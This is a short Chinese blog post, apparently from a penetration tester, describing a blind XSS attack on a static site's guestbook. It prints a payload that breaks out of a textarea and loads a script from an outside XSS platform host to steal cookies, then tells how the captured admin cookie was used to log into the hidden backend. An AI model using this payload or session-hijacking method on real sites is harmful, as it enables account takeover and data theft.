某次日常xss盲打

本文讲述了作者在进行渗透测试时,针对一个静态网站的留言功能进行XSS盲打,成功获取到cookie并定位后台地址的过程。利用火狐插件修改cookie后,登录到网站后台,发现使用了kindeditor编辑器,尝试白名单绕过上传图片但未能成功。
摘要由CSDN通过智能技术生成

今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。

盲打使用的xss平台的默认模块Payload:
ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea>
在这里插入图片描述快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,话说这个地址 FUZZ是FUZZ不出来,怪不得早上忙活半天也没找到后台地址,┭┮﹏┭┮
在这里插入图片描述
有了cookie和后台地址,那我们就可以利用这个登陆了
找了个火狐插件cookie-editor,把这个cookie值填进去,访问那个HTTP_REFERER地址成功登陆进去啦。
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值